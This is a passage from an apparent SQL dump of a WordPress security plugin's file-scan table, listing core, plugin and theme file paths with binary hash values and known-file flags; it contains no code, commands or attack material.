��c�','',0,'?'),('�͌%+�e�@uQ(�','wp-includes/js/dist/editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ũ8��6uj(X4ѨÎ�','������U:W�{\n�b)SN��.=}c�A','',0,'?'),('�k8Q?<׊��y�p�','wp-content/plugins/akismet/views/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�CN3|)-�2Na���','���t�Cz� ����n�`j\r�M��N\"Ag���','',0,'?'),('�#��A�9��`�ـS','wp-content/themes/newsmag/assets/vendors/blazy/blazy.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���NNmc��GWRj9�',',r��2\rN�$���V��\"�f�{����?�ġ�','',0,'?'),('�<���=o2�%�mE��','wp-content/themes/graphene/js/chosen/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�͐�Q��C���6��?','Ȩo�1�g+x�JDC��\"3�{�Ѡ����','',0,'?'),('�=�m����^D6W�','wp-content/themes/twentynineteen/sass/modules/_clearings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vY��P\\;���4�','�s���3s=���#q���˞< �I\'r&�','',0,'?'),('�FU�G��Хd�c��NC','wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Al͟��\ZԀ�c��','�x�����(��Sn��\n;�y{%�_�j���/','',0,'?'),('�JD�;/����','wp-content/themes/newsmag/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-=z��H���p	','�q����?�N�#�ߘ��\r���#\n�߰��','',0,'?'),('�sR�FGK��k�St�','wp-content/themes/edge/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b��S���ݓ$�NcJ','���Q�>�b}EJ�4����TsL!*sm�Į�','',0,'?'),('ǂ-i)�.�\\���z�^a','wp-includes/Text/Diff/Engine/shell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�����?��z&','�=5��:Pu\'pM�N[�9^�m>z@','',0,'?'),('Dž�9��9:���\Z�','wp-includes/cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��V��O��yDv� !','{�d���<>wb�S�q����B������','',0,'?'),('dž_5�2�߱�c�ƫ','wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�vm_��I��\\����','\r��鋕��1(���p�KH�KBY����eB','',0,'?'),('Ǎ]�$�y�\\���','wp-content/themes/simpleshift/inc/kirki/autoloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�`���7��ZV�؅','�\nr^�a^�qXA%��V�4)0�6��ZOHS��','',0,'?'),('ǒ�{�bS���ר�6','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/branding.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�迾��IBꪼg','�\06z=�a����\\��(���GmTꥪ7SQ','',0,'?'),('ǝ�^�x�JB\Z�3-�6','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��5]{\"���V�','�C�Jr~W�OY�*[�:[j)���G�Є�e�','',0,'?'),('ǟl�ճΕ�\n.���H�','wp-content/themes/simpleshift/inc/kirki/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jמ�^��~p\\t��','�|XC��U�,.���\n����]+M (K�u�c�','',0,'?'),('Ǥ>z�Ԅ��!J]>','wp-includes/css/wp-auth-check-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�P��KN��zj��K','V<e�b��(�k��I��2�\ZÜu�/#4Ɇmz','',0,'?'),('ǩ\\�~�:�.^����','wp-content/themes/quicksand/js/customize-multiple-checkboxes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7P6L)K�6�;�ͯ','��	)�:Yw<����۰�c��ed�v�%��G','',0,'?'),('ǩ�XdrY[�w�ĺ�','wp-content/themes/advance/inc/kirki/includes/dynamic-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p ���v+���Fx�','ǣ�����b �n/�C�X���<�lF�S�','',0,'?'),('ǫ�=��m�/���^','wp-admin/includes/schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���PI ��k�����	','&�v��x¡�gu�SV���ҏ����r�','',0,'?'),('Ǭ�9p���RJ���','wp-content/themes/advance/inc/kirki/assets/scss/global.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5l�b>�3��9ZJ�','�Ȝ�7�Kc`�ɧ�k�����F9�L���','',0,'?'),('ǭj�߃�;4��*','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-debug-logger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�`�p.�Zb �x3I','#O)r�a�%�����r�2tK�P��1��kw��','',0,'?'),('dz\\��_L-Y�Ō%$','wp-includes/ID3/module.audio.dts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�llA�2���̋�','\Z�aH���r���%A���6$`Hu�T�6y�4�','',0,'?'),('Ǽ\'�K�^�]�^�5�-)','wp-content/themes/event/inc/customizer/functions/design-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d��|}=:�G��','�)��D�fm�-I��\"��J���\r�Ӫ��p|�ؘ','',0,'?'),('Ǽ=���/%�@6�Dn','wp-content/themes/twentynineteen/sass/modules/_alignments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3��\\�sӳR��]iO','̰簃b���p4�i��шB6����A���','',0,'?'),('��7L>ݸ���c���','wp-content/themes/Endolf/FT/inc/lessc.php',0,'���y\\������wб=','���y\\������wб=','�*�-wc�N��8qEiIy1\Zs���N�d�@�','',0,'?'),('��W1)Q�����	','wp-content/themes/hitmag/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��fcL�ŷ�b�2�s!','p�)���\0i{�v��7��J�`@B�Apq�\n�G��','',0,'?'),('��w��y�*�X�O\nG��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�Vl~�m[%Wt','P�q\0������V{|�0m\0;���2�f@U�','',0,'?'),('��}�C�wX�TC��','wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m]�a���\\$��','Ǘ�h?���S���)�:���i@h.��X�g��','',0,'?'),('��U�L�8-K�M�O�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/lint/lint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E���CLb_Y�NE','���ӟ5�}�i��L���R���$�.�h2�B�','',0,'?'),('����~��ЗP�\\�\'�','wp-content/themes/catch-responsive/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{#ܓF��+��\\�','sy�5�F!(��v2@�hܵi���*gQ�f�b�','',0,'?'),('��w.�(S�*I�e','wp-content/themes/twentytwentyone/assets/sass/06-components/entry.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nB���j����',')���i�o�[G\ZC�)E�ϳl�\r�h�d�!','',0,'?'),('�����}u�^<���','wp-content/themes/metro-magazine/inc/template-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`5�	�y,n����A�','Ƴ\\4�ڤО�\'e=��O�Gg�9�5��m}�','',0,'?'),('��i\"U���PF1U','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-select2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�_K�ә^���S','u\0yUM���ɪ���vU�Y`�I�A5xa�vN@','',0,'?'),('�/�D�17X;>��','wp-content/themes/skt-pathway/full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�Q(�v�\'R9��','����\nFX���d�\0��CR�:�Ν>	vX','',0,'?'),('�\Z{g�?�3gڢ\Z�','wp-admin/images/icons32-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�*�����g����','�#!$��@�0g�.�;i3%!�cHP���=','',0,'?'),('��fp��\0!�tDK','wp-admin/js/code-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�\'߽	�%���','��-�Bd/�`��\\V�x6Y*��-$����W','',0,'?'),('�\"u@��T��S��5�','wp-includes/images/smilies/icon_idea.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<]�W3tށ�','�{�2^4S����Tl���I�J�Q��\"','',0,'?'),('�#��Q���V�U�i+�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/stylus/stylus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�\ZB�\"4�]C\Zh1','8Fb��lv�l�E�]�e�����O���\Z��','',0,'?'),('�7�\0��tt��.','wp-content/plugins/wordfence/views/dashboard/status-renewing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','an�$�6�����\"','�tɢ�����C-?�\'(�uꢦA�T-1ba��:','',0,'?'),('�8����R�6>G\"���','wp-includes/js/dist/element.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pO�E����6�wR%v','�h�4[��0��7-��\\{�e��$.(.���o�','',0,'?'),('�;����N�Q>���','wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��vwX\n_Yg!��','r;�\Z� G�����[i$�)���v�]j7�im#','',0,'?'),('�Rp��3�ܫ�_3�','wp-content/themes/graduate/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������LQ��ʭ��','|�Q,����v�{d�,�$[��u��','',0,'?'),('�W#�!��3j�w��Od','wp-content/themes/monograph/genericons/Genericons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s/�n]�d���z�?','�*���SW����.��~5t�=���V�p̦�','',0,'?'),('�Y$\'����o���','wp-includes/css/wp-auth-check-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���jv�sZ��ܻ&h�','F�V=&G\"�r��\rF�p��\nJ�ݣ�=՟3�','',0,'?'),('�a�t�:�|�u�l�','wp-content/themes/hemingway/js/global.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O�D��fd���\r N[','�p���m��k\'��:��f�;[ahfl�C�','',0,'?'),('�e��f�R�@�x','wp-content/themes/saybusiness/template-parts/biography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5`1:���~�����','��U��E��>\n�>�7�	J!E#�Ֆt�\rex','',0,'?'),('�l<�R�]J���U$�','wp-content/themes/simpleshift/inc/kirki/assets/images/kirki-bottom.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x*QX�WTe���8�','�cA(Ϲ��0��\ZQ\n/���B�9��B���c','',0,'?'),('�u��C~7\n���W�e�','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�we�J�����@�?��','�W�ľ�6���7#`_�g�;���,9�.��=','',0,'?'),('�x�8�6X���O$��c�','wp-content/themes/graphene/loop-post-formats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f׃�c1,�|�s�','ӭj���u[�c��q��ӵF\\��ro��.�Ŵ�','',0,'?'),('ȁ��#/�\0��6','wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4��ӹu�;P�','�aD�,�ǭ��+v�Fe\"+���!���1t','',0,'?'),('ȍP�� �3����\n��','wp-includes/class-wp-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(���H�g1k!~','Գh(��m7B��.�oǏu��ʼ%a��1ʾ�','',0,'?'),('șgH��^��Р�\Z��','wp-content/themes/Yegor/FT/plugin/options-framework/js/media-uploader.js',0,'�A���@�k@VgdH','�A���@�k@VgdH','�l��k��&��Snt��m���b�̧:S���-1','',0,'?'),('ș��)�p�J�ʗ��P','wp-content/themes/saybusiness/inc/theme-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p��h\n��o@M�','�p�G��z�6�:y����Ko��L5<9��','',0,'?'),('ȣ�gӰ�DZCs��','wp-content/plugins/wp-cerber/assets/flags/cs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qȥ�`�����','���3�#�xUN�^�[ ^�1�a�֌�GX9PP','',0,'?'),('Ȳ>�>��h�SM','wp-content/themes/newsmag/inc/customizer/epsilon-framework/control-epsilon-upsell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bm�L�?M_B���2','�$h�A�Dgb���F�B�p����oc�ƚTƄ\n','',0,'?'),('ȿ�-��`�u���o��','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�m;S��V#��m�I','�R9F��������47i}�ʧ��C^�%','',0,'?'),('�+a��������','wp-content/themes/enigma/css/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ɆTDj�]�r��','�gꛜ_�(RN8z/߉��niM�G','',0,'?'),('��/y�Q�PT��1+߂','wp-content/themes/catch-flames/js/fitvids.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�͑Y�Dgؖ\\~��','����#$J��Dn�\Zh �����!�ܗ�	z�','',0,'?'),('���ܻ���\r4�K�{J','wp-content/themes/advance/inc/kirki/includes/class-kirki-toolkit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z=+T\Z�5ecؐH��','�Oo�P6�:|5/M�_�6#.y�Ύ�y(���','',0,'?'),('��{V\\^1q`t�(�6U','wp-content/themes/wp-simple/assets/images/overlay.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-R/s�Y~���p�o','����p�J�r%��#N��qT�\\gS?H��;','',0,'?'),('���=K������Q','wp-content/themes/newsmag/assets/js/functions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�\\��)�>�t?','`��!�O{,�L���ᱱ��N�ڨ��D��','',0,'?'),('��y|u���Y��{�n','wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-toggle-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w!fTǦ˝�`','?\r��\01re��,	�	�PVw�%�\0�X','',0,'?'),('��_�ko���-^k�','wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-radio-buttonset-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����1��f5{��g','js/�/8�0��,��|b�@��	B\"�.�*�O�','',0,'?'),('�����~\r\ZK4(#��','wp-admin/user/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(팋�#��A���;�','�u�A���+I/�㊓\0�n�N�1G8�\ZD-�','',0,'?'),('��B�{��l^|R','wp-content/themes/skt-pathway/images/slides/slide1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���驴�n��/���','�i0�Ka�1�3Ƭ����6�1����E~Gr�^','',0,'?'),('�!�`�L�i\0Ը�u','wp-content/plugins/wp-cerber/assets/flags/mf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�5�iD�hI�6�;','wp-includes/SimplePie/Cache/Memcached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n�\'Xlab��4`','?O�d6�C���u���>Jr��h�t����e���','',0,'?'),('�7ŭ����OE6','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filesystem-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�tg��q�O1�0�','�Džg�L���)�Q�r���ty�jX��O�\n�&	�','',0,'?'),('�A7�\'�C#�w�S�s�','wp-admin/css/about.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x ��\0�\Z�*m7v%',']jH��#���?�����j6MI�aҰ�(e��','',0,'?'),('�KK���)Ș����>','wp-content/themes/quicksand/js/lightgallery/css/lightgallery.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�=�H�(U��<','����H����UG�{�ޟ��}��`�Y^B��','',0,'?'),('�V�*]�|@e&�z��','wp-content/themes/gambit/inc/customizer/functions/callback-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��okn,��_���F�=','rq8Sbp�b�ȷ�p�v0m��%2o7���?�','',0,'?'),('�lX�w��B�*X�W�','wp-content/plugins/wordfence/images/sort_asc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oɧ��*�X���9e','�v�\Z�|5.YX ������Z�鹁Ź','',0,'?'),('�mx�͆���o�|��-','wp-content/themes/hitmag/inc/kirki/assets/scss/controls/dimension.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������?�@�X�u','�W16N\Z��y�$���0��lW-����m','',0,'?'),('�nv���������lW','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/css/scss.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%\'rz�#�\\AQ#�','�ϸ����?��K��?�%b�,Cu�&�<','',0,'?'),('Ɇ8���pŻѵV�','wp-content/plugins/wordfence/lib/wfActivityReport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pnӑ,vP*�`4i','��)ed}&�C�\"_ڸ�l<z�U�,?b:��@u','',0,'?'),('Ɏ�g�g\n=�k:��H��','wp-content/themes/city-store/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mm9Xw\\�&!6a-@�','�|��e:��M�뤹~���\\n���,	ӓ�{>S','',0,'?'),('ɡʧ~����.)k','wp-admin/includes/class-custom-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_%��5�ߔrg[\Z�','��3�4�n�8�@�}���!��pc�8�\0�̴','',0,'?'),('ɪP� \r\'u�E���M�c','wp-content/themes/wp-simple/inc/kirki/tests/test-kirki-fonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U���a�q��2}','�J��_Xx93?\Z�5�N�ʯ���\n��M$�ך','',0,'?'),('ɪ�$��W�\r};s}QL\r','wp-content/themes/saybusiness/template-parts/page-full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�>�k�ٮ�nA�','��v�-��Qt�A���4&�*L�L�y/�\nEZ�t','',0,'?'),('ɰ��Qq���c��','wp-content/themes/catch-flames/images/social-profiles.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M.TF��4��<#�s','��wz�2�@�_9+���e4]��X���\ZDܗ�m�8','',0,'?'),('ɲ�i���B�%~��|H','wp-content/themes/hemingway/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6?�$�йI�','dsp{ǰ��o�O��zp�̗��*2�u���Ej�','',0,'?'),('ɴ|sC��«�h����','wp-content/themes/simpleshift/inc/kirki/assets/js/controls/dashicons.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yrK�{�J��mf�Q��','畦��A\'!���K��rN�2����u�v.�d','',0,'?'),('ɹ۵�SK��$���p�','wp-content/themes/city-store/inc/customizer/functions/featured-content-customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']^$ݬ�-�sM�','�Wm���f�ӷ�EH�yv�ۑ�lq،�\rXp1H','',0,'?'),('�r�)x��Sm���h','wp-content/themes/event/inc/customizer/functions/register-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�\r���9Y=��A�','э�l\Z�k^�xU䊒�����>��hӨ���','',0,'?'),('��+e7($�}GE��','wp-content/themes/graduate/assets/js/unminified/custom-customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˕I���N�i�','	S~���f9v5�J+���>GO,8��DBD','',0,'?'),('���l���Q�[��1','wp-content/themes/twentytwentyone/assets/css/style-editor-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�����y���\"�Ys','3�2�/ι��Dp�nXe\0uQ\nO#��G','',0,'?'),('����8g��Ԗ��','wp-content/themes/singularity/inc/customizer-library/extensions/preview.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K��⠡5I���e','ӱ����T��n�����ًr6w��,�z�pK^','',0,'?'),('�����2D�i�e�','wp-admin/css/l10n.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ĸ�P)�|��q�r���','wppS���\"�D�.��o�MO�m�O�\'b�aNj0','',0,'?'),('��w�\\���ŀ���G','wp-content/themes/enigma/css/font-awesome-4.7.0/less/list.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Uq2<������6�\'','g�_����\n٩���غ�b�\\�[놜�ȿ','',0,'?'),('���ZX�\\��Y�#��U','wp-content/themes/graphene/images/social/gowalla.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u6ZSY��Q��2��','��xq�\'Z�L$��u�!�a�(�\'���Q�r��','',0,'?'),('�	��!�Yi9\r����Bq','wp-content/themes/auberge/includes/custom-header/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a��6\rP�530\n�R','��x[E-�	�=7\rڮ�Q��o4I��D��>','',0,'?'),('�	��_�Ώ%���b�2�','wp-content/themes/auberge/includes/theme-options/theme-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��&��k{֧��','�d~Y+L*�Qb&Q��a aԂU�\Z��*�l\0�#}�','',0,'?'),('�ͤ� �T���-�','wp-content/plugins/wp-cerber/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��=v����]���V','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('������d�(�a','wp-content/themes/gambit/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�t��DՁ�R�','��\\s{��\ZZ�g�|)4�P�l�u�((�di{','',0,'?'),('�����l�V�^~���','wp-content/themes/hitmag/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0������uA��','>����\\��>+�.����ʪ��X�2�C','',0,'?'),('� �\n1�l1S����w�','wp-content/themes/graphene/admin/images/template-twocolumnsleft.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�Q�1n,~N�2{��','+\0H�Bi�r�����>A��\"�\\3e�ڷ�]�5','',0,'?'),('�(�q�4P�}�5Oz�k','wp-admin/js/inline-edit-tax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ƶ���s�[��\"�','�]:\r+�����ʩ\'X�bҸX�����LU�','',0,'?'),('�(XD�ZrA��,JԀ','wp-content/themes/simpleshift/inc/kirki/assets/scss/sections/expanded.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ڝ�3�@��X',')��k�/>-ԕ�ܳkR#�H@�-�<���','',0,'?'),('�/#�c���` 䃏���','wp-content/themes/wp-simple/inc/kirki/assets/xml/colourlovers-top.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�L2Y�XO������','h�xU�.;�0\0���3��X;t�_v垐��I�&�','',0,'?'),('�=��-��lC�u�*ء','wp-content/themes/university-hub/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9Ń�2�1�Ϟ��','�WU��@������̬�d�gK�?�V4$���','',0,'?'),('�Q�%[���$���Q0ݧ','wp-content/themes/lovecraft/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��I� U��\re|�','�N�cD�X�W7�l�6?�ol�W=�H�<eKV','',0,'?'),('�R���ш�޿�0','wp-admin/css/themes.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L\0���M���\"�\\\\�','9\\�P�;P�;p�%/���?����]z]C�ǐ��','',0,'?'),('�S�ɨ�������k','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/date.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��^e���)\n8Vx�','uఓ2*)��5���;8������[�·&�6�L','',0,'?'),('�hFM<@`%q-��','wp-admin/includes/class-wp-filesystem-direct.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�,k�=G�c�x�','C������	�9�1�@���*C���Z','',0,'?'),('�r��{�\Zk��\"��k','wp-admin/css/site-health-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�9��yu�S�,�,�k','�	�m���������BFX&I�[s��','',0,'?'),('�t\n^�ѪHɻL��9','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-dimension.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l���������`2�','s��ȋx��ǫ�pL�>��E	�*j�9��*fE','',0,'?'),('�t*4bo����e0-x','wp-content/themes/weblog/acmethemes/core/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d��w�9�ͻ;�','h�e�� .7��V[�æ�?�,_RyS����N','',0,'?'),('�xjP����!c�x','wp-admin/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�*���#��_��ҳZ�','�����f��uG#����\'��_ً�:�F�A','',0,'?'),('ʂ[	&�?p�bD','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui-timepicker-addon.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A��MA�@����|�','u��\Z�Ӛ1!�b�� \"�0SBȓ>�rEk�','',0,'?'),('ʆ3{A[�)7Fw��','wp-content/themes/exoplanet/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;`�q��A�Ov�','�3A�p \'�#���]�.��m/yl,�����Q','',0,'?'),('ʆ�5���w&�G�','wp-content/themes/saybusiness/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϥ��|��k*f�V�;X�','�cG\Z�B���`ŝ;8�郻4q�ȦF�,A��','',0,'?'),('ʇ��\\lH�2\r�Z��Xf','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/keymap/emacs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_\'„Nn�쫅2s��','ʋ��w��A�3j6�L\Zp�3̞� U�pJ','',0,'?'),('ʑw>�������6��','wp-content/themes/enigma/images/portfolio3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5� �ؽ�|�&��','����pʼn��V�\Z�dH�E�P7�N�\'��+kId','',0,'?'),('ʙ�^z��n O�ޛ#�','wp-content/themes/graduate/inc/core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ڙ�L�[A�U','2�\0������;�v<�Tu$}6��4���5','',0,'?'),('ʢ��yG}�Jx�0�','wp-content/themes/the-best/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��qI��]7\Z����','�\0���kK\n�k�?�(����K�éw��.y���','',0,'?'),('ʨ��7�����]0','wp-content/themes/gildrest/template-parts/common/articles-normal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�6��9�&����V�7','��k��c�ς=���k\r�]a���+�$���P','',0,'?'),('ʴM\ZN��@���ɇ�','wp-content/themes/auberge/assets/js/vendor/slick.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(�(9�6�\"U�T��','�U�����`�0Y��\"H����ә@���','',0,'?'),('ʵs��	����R>��?','wp-content/themes/twentytwentyone/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G:��Ll�}\0!��%','mDTZ��\r�τ(c�zG�ܟKl�@����Kv','',0,'?'),('ʿ�\"�y���d�F�~','wp-content/themes/graduate/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$.�͢�#1��F�','٨��a冩��A�yF�#\"=��|��P��','',0,'?'),('���W�>�ҟ����[','wp-includes/Requests/Exception/HTTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h���Rlr��','o�E²tQQbo\n����r�Qq��\"�/����','',0,'?'),('��&�����~sXm','wp-content/themes/twentytwenty/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Kp@/ya3ˡ�ZіO','��1�*C�4é�GNÈOA�p1v7.�wV%��2F','',0,'?'),('�܆R(�\'2Whp���G','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0